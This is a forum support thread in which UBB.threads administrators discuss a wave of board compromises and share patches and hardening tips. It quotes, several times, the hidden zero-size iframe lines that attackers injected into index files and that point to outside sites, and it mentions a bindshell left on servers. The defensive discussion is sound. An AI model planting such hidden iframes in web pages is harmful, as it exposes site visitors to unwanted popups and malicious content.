Previous Thread
Next Thread
Print Thread
Hop To
Page 1 of 2 1 2
Joined: Jun 2006
Posts: 23
M
stranger
stranger
M Offline
Joined: Jun 2006
Posts: 23
Last night my board (running 6.5.2) got hacked and I can't figure out how.
At the end of all index.php, index.html files and ubbthreads.php there were the following two lines added:

<html><iframe src=http://neoffic.com/t/?id=soauker width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>
<html><iframe src=http://neoffic.com/t/?id=soauker width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>

Some users complained about popups and slow pages and that is how I found out that my board is compromised.

Actually, since I run many other virtual servers on the same server, all their index files were modified as well. So I think this guy have spent lots of time to find them (I have about 80 gigs of data in zillion files). The modified time was identical on all compromised files.

Did anyone have similar issue? I googled it and it appears that other ubbthreads boards were target of this attack as well.

My board is under heavy traffic and it is near to impossible to analyze the webserver logs.

Any idea how to patch ubbthreads agains such attacks?

Joined: Jun 2006
Posts: 23
M
stranger
stranger
M Offline
Joined: Jun 2006
Posts: 23
Well, I've just noticed another hacked board of a user of these forums - http://threadsdev.net

Poor fella has 4 iframes that almost locked out my computer. I had only 2.

I think this evil genius is finding his targets using Google. Maybe a simple filename renaming of the key files like ubbthreads.php could help for now?

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
Check this thread:

https://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/4560063

There is a fix for the security hole that is being used.

Joined: Jun 2006
Posts: 23
M
stranger
stranger
M Offline
Joined: Jun 2006
Posts: 23
Thanks! I have just stumbled on it as well.

Joined: Apr 2006
Posts: 116
F
member
member
F Offline
Joined: Apr 2006
Posts: 116
I followed the neoffic link and it took me to http://www.ixwebhosting.com/

Here is the chat session with one of their operators:

Chat InformationPlease wait for a site operator to respond.
Chat InformationYou are now chatting with 'Satish Manem'
Satish Manem: Hello, how may I help you today?
you: Do you know anything about recent Hack Attack on UBB boards?
Satish Manem: I've read that last week was the worst in the history of hacking for hack attacks, and the target is Windows.
Satish Manem:
you: Well I have got the address of your website from the data that was left behind by hackers
you: how can you explain this?
Satish Manem: Do you mean we involve in hacking ?
you: I don't know, are you?
Satish Manem: I am sorry, we are hosting services providers.
Satish Manem: We just provide the hosting space for the domains.
you: I can see that, but your information now is pasted all over the hacked BBSes, why?
Satish Manem: I have no idea about that.
you: Am I the first person to tell you this?
Satish Manem: Yes
you: Hahaha you are full of [censored]
you: Are you not going to respond to this?
Satish Manem: Let me know if you have any other queries regarding hosting ?
you: Why should I you already look dodgy, and now you lie through your teeth, why would I be interested in your hosting?

that was it, sorry <img src="https://www.ubbcentral.com/boards/images/graemlins/smile.gif" alt="" />

Joined: Jun 2006
Posts: 742
enthusiast
enthusiast
Joined: Jun 2006
Posts: 742
I had 5 hacked Threads boards today myself. Thanks for the fix!!


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Joined: Jun 2006
Posts: 3,837
I
Ian Offline
Carpal Tunnel
Carpal Tunnel
I Offline
Joined: Jun 2006
Posts: 3,837
Thanks - I think we escaped - but are now patched <img src="https://www.ubbcentral.com/boards/images/graemlins/smile.gif" alt="" />

Joined: Jun 2006
Posts: 742
enthusiast
enthusiast
Joined: Jun 2006
Posts: 742
I had to patch just over 50 installs at VertexHost.com and uncomprimise a couple of servers.


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Joined: Jun 2006
Posts: 3,837
I
Ian Offline
Carpal Tunnel
Carpal Tunnel
I Offline
Joined: Jun 2006
Posts: 3,837
I can find no evidence of it on any of our servers - mind you I have had enough hacking attempts recently to last a lifetime LOL

Joined: May 2006
Posts: 5
D
stranger
stranger
D Offline
Joined: May 2006
Posts: 5
We also had this problem and I'm glad to see it wasn't just us. My sys admin said that the modification required root access. Does this sound consistent or plausible?

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
Hi David. Was your sysadmin saying that the hacker required root access? If that's the case, then no. It allowed them access to anything the webserver could write to. At that point on some servers they uploaded a pwned or bindz script that could be started . I still haven't been able to get my hands on either of these scripts to see what they actually do.

Joined: Apr 2006
Posts: 116
F
member
member
F Offline
Joined: Apr 2006
Posts: 116
Why don't you post them here so we all can have a look?

Joined: Jun 2006
Posts: 23
M
stranger
stranger
M Offline
Joined: Jun 2006
Posts: 23
I have followed hacker's links and downloaded bindz plus the tools he used. They are, I must say, pretty good. Let me know if you want to see them and will send you the link. (Don't want to post them here because... well you know why.)

Joined: May 2004
Posts: 38
H
newbie
newbie
H Offline
Joined: May 2004
Posts: 38
I also was hacked.. and yesterday i applied the patch that was listed here.. https://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/4560078/"

However i was hacked again after those two patches were applied... If i go to the admin panel and close my forums can i still be hacked..

And is there other forum software that is less vulnerable than what infopop has produced..

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
You'll probably want to grab 6.5.4. It's possible that the one script that was found to be potentially vunerable was used. It's also verypossible that there were backdoors left from the original hack. Usually if someone gets in, they will always try and leave themselves a backdoor. Do you have access to your server error logs? If so, you can look there to see any unusual requests for clues.

As for less vulnerable software. Unfortunately this seems to happen to just about all of them from time to time. Do a quick scan of google and you'll see there's been security releases of this nature put out for just about all the major products. If there is a hole anywhere it will be found. It would be best if the hole was never there, but unfortunately it was and the only thing we can do is get a fix out prompty, which we did.

Steps are being taken in the way version 7 has been developed to help in the security area. We've been doing this long enough now that we know what the common oversights are that usually cause these problems and will be doing everything we can to preent them in the future.

Joined: May 2004
Posts: 38
H
newbie
newbie
H Offline
Joined: May 2004
Posts: 38
Rick, I have submitted a support ticket to get the security patches up thru version 6.5.4

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
Great, I'll go and get you the fix.

Joined: Apr 2006
Posts: 116
F
member
member
F Offline
Joined: Apr 2006
Posts: 116
Rick, what register_globals does? Is it like use strict in perl? I would like to know just in case I have to fix other scripts that don't like it.

Joined: Apr 2006
Posts: 116
F
member
member
F Offline
Joined: Apr 2006
Posts: 116
Ah, ok, I googled for it and

"...From PHP 4.2 onwards, the default behaviour of PHP is to have register_globals set to off..."

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
It is default to off, but you'll still find it set to On quite often. It's a good idea to check and see what the setting is for your install just incase.

Joined: Oct 2006
Posts: 12
T
stranger
stranger
T Offline
Joined: Oct 2006
Posts: 12

I have the following error when I applly the fix and perform the upgrade:

"The following files are reporting a wrong version:"

all changed files are then listed despite the fact that I have uploaded the latest files (version 6.5.4) onto my server.

Is something preventing me from applying the fix?

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
Hi Thwala. Try looking at the comment section (first 10-15 lines) of one of the changedfiles that you uploaded. Make sure that they say # File Version 6.5.4 in that section.

If they all have that, then we can do a manual upgrade for you. Really it's just a matter of uploading the changed files and then running one db command.

Joined: May 2006
Posts: 5
D
stranger
stranger
D Offline
Joined: May 2006
Posts: 5
Rick,

After speaking with my sysadmin in more detail he is pretty sure that root access was obtained via the blindz script. If you want to talk to him directly I would be happy to send his contact info along.

[]Hi David. Was your sysadmin saying that the hacker required root access? If that's the case, then no. It allowed them access to anything the webserver could write to. At that point on some servers they uploaded a pwned or bindz script that could be started . I still haven't been able to get my hands on either of these scripts to see what they actually do. [/]

Joined: Aug 2004
Posts: 460
Addict
Addict
Joined: Aug 2004
Posts: 460
Rick, for the 6.5.4 ypgrade that you mentioned, is there a short list of the lines of code that should be added just like for 6.5.3 where you mentioned two files and what needs to be changed within them?

For instance in showflat is define('SHOWPOST',1); the only thing that needs to be added? Is it also ok to do this for 6.5.2 or 6.5.1?

Joined: Jun 2006
Posts: 9,242
Likes: 1
R
Former Developer
Former Developer
R Offline
Joined: Jun 2006
Posts: 9,242
Likes: 1
Unfortunatley there's not a list, for the most part it's the same type of quick fixes. I've kept this information off the public forums as to not provide any info to potential troublemakers for everyone can upgrade. If you need the exact changes, just open up a support ticket and I can give you more info.

Joined: Aug 2004
Posts: 460
Addict
Addict
Joined: Aug 2004
Posts: 460
Thanks man, Josh sent me the exact changes via a PM on threadsdev.net.

I noticed a strange file in my threads folder: bindtty

I downloaded it and erased it straight away but have no idea whether it was just uploaded by someone or whether it was part of the file restore that I ran on my server. Hmmm...

Will the file come in handy, does someone want to take a look at it? Can any information be gained from it?

Joined: Jun 2006
Posts: 956
Old Hand
Old Hand
Joined: Jun 2006
Posts: 956
"i suspect bindtty is just a bindshell that opens port 5299 and allows people to connect to your server as whatever user the program is run at..

if its in an ikonboard dir i expect they've hacked you via some insecure script and got in as your httpd uid. might be worth doing a further search around your system to see if they've done anything else"

found with Google.


my board: http://www.dragonclan-forum.de
my hobby: http://www.biker-reise.de
Ich kann bei Fragen zu UBBthreads in Deutsch weiterhelfen oder es zumindest versuchen
Joined: Jun 2006
Posts: 16,292
Likes: 116
UBB.threads Developer
UBB.threads Developer
Joined: Jun 2006
Posts: 16,292
Likes: 116
bindtty is, in most cases, a mallicious script; if you did not put it there, it is not bundeled with any infopop product (to my knowledge).


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Joined: Aug 2004
Posts: 460
Addict
Addict
Joined: Aug 2004
Posts: 460
I know that someone put it there without my knowledge. No doubt about it.

But can we find anything out about the people responsible by analysing the file?

Joined: Jun 2006
Posts: 956
Old Hand
Old Hand
Joined: Jun 2006
Posts: 956
its a generic file, just google for it, you will find many sources. Its part of a root kit. You have to analyse your server log files to find out from where it comes. I guess it comes from brasilia ....

You can do nothing.

Erase this file, check the server for any kind of rootkit, dont allow the excution of scripts from the /tmp folder, apply any php patch (5.1.4 is actual) turn globals of and check any script running on your server for updates.

There are many scripts out there with security holes. I found a gallerie script on my server with possble XSS holes. Threads closed many holes and I continue my checks.

Watch your server error log file frequently


my board: http://www.dragonclan-forum.de
my hobby: http://www.biker-reise.de
Ich kann bei Fragen zu UBBthreads in Deutsch weiterhelfen oder es zumindest versuchen
Joined: Aug 2004
Posts: 460
Addict
Addict
Joined: Aug 2004
Posts: 460
[]dont allow the excution of scripts from the /tmp folder[/]

How does wiping the folder clean sound?

I just chucked out all this stats mumbo jumbo and emptied the entire foler. Does that help? <img src="https://www.ubbcentral.com/boards/images/graemlins/smile.gif" alt="" />

Just out of curiosity, is it still true that no Threads board has beed hacked with the globals turned off?

Joined: Jul 2006
Posts: 2,143
Pooh-Bah
Pooh-Bah
Joined: Jul 2006
Posts: 2,143
[]How does wiping the folder clean sound?[/]

Doesn't mean something won't be put in there 5 minutes from now. Your server is supposed to use /tmp. It's temporary workspace. What you want to do though, is ensure that things put in there can't be used impropery. Removing script execution goes a long way toward acheiving that.


This thread for sale. Click here! [Linked Image from navaho.infopop.cc]
Joined: Aug 2004
Posts: 460
Addict
Addict
Joined: Aug 2004
Posts: 460
Hi Dave, do you mean changing the permissions for the folder, or also for files inside it?

The folder is set to 700. Should I also disable the "execute" attribute for the owner and make it 600?

Joined: Jun 2006
Posts: 869
old hand
old hand
Joined: Jun 2006
Posts: 869
I turned off the globals, as per code given a week ago or so.

Got hacked day before yesterday

[]<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>[/]

Makes me wonder if they got our domain address by coming here...


http://clubadventist.com/forums

No longer following the carrot
Joined: Jun 2006
Posts: 869
old hand
old hand
Joined: Jun 2006
Posts: 869
am eager to try the alpha or beta 7.0 version.

Joined: Jun 2006
Posts: 956
Old Hand
Old Hand
Joined: Jun 2006
Posts: 956
As I see you use 6.5.1.1
Get 6.5.4 or open a ticket to get information for another fix. There is still another hole in the system that can be used to hack your forum.
Or do you have apply the 2 fixes an got hacked again ?


my board: http://www.dragonclan-forum.de
my hobby: http://www.biker-reise.de
Ich kann bei Fragen zu UBBthreads in Deutsch weiterhelfen oder es zumindest versuchen
Joined: Jun 2006
Posts: 3,837
I
Ian Offline
Carpal Tunnel
Carpal Tunnel
I Offline
Joined: Jun 2006
Posts: 3,837
[]I turned off the globals, as per code given a week ago or so.

Got hacked day before yesterday

[]<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>[/]

Makes me wonder if they got our domain address by coming here... [/]

More likely just via google or similar.

Joined: May 2004
Posts: 6
P
stranger
stranger
P Offline
Joined: May 2004
Posts: 6
I found this guy

[]soauker@gmail.com[/] he hacked my site today and admitted doing it. I tried to get Google to give up his details. They told me to go !#@ myself.

This guy soauker is a member of a cyber hacker group and has actually even reported a few php vulnerabilities in phpnuke in the past.

His gig is to run up the CPM impressions on some banners that someone is paying him to run. I'd pay him to leave my site alone.. Yeah either that or burn his house down and sow salt on the land so that nothing would ever grow there again.

Joined: Jun 2006
Posts: 869
old hand
old hand
Joined: Jun 2006
Posts: 869
On of our members did a "go back" click and it showed which domains it is clicking on, this may be useful
[]http://clubadventist.com/clickback.png[/]


http://clubadventist.com/forums

No longer following the carrot
Joined: Apr 2006
Posts: 116
F
member
member
F Offline
Joined: Apr 2006
Posts: 116
You guys are still using Internet Explorer? Then you have no right to complain about security! <img src="https://www.ubbcentral.com/boards/images/graemlins/wink.gif" alt="" />

Page 1 of 2 1 2

Link Copied to Clipboard
ShoutChat
Comment Guidelines: Do post respectful and insightful comments. Don't flame, hate, spam.
Recent Topics
spam issues
by ECNet - 03/19/2024 11:45 PM
Looking for a forum
by azr - 03/15/2024 11:26 PM
Editing Links in Post
by Outdoorking - 03/15/2024 9:31 AM
Question on barkrowler and the like
by Mors - 02/29/2024 6:51 PM
Member Permissions Help
by domspeak - 02/27/2024 6:31 PM
Who's Online Now
1 members (Ruben), 476 guests, and 111 robots.
Key: Admin, Global Mod, Mod
Random Gallery Image
Latest Gallery Images
Los Angeles
Los Angeles
by isaac, August 6
3D Creations
3D Creations
by JAISP, December 30
Artistic structures
Artistic structures
by isaac, August 29
Stones
Stones
by isaac, August 19
Powered by UBB.threads™ PHP Forum Software 8.0.0
(Preview build 20230217)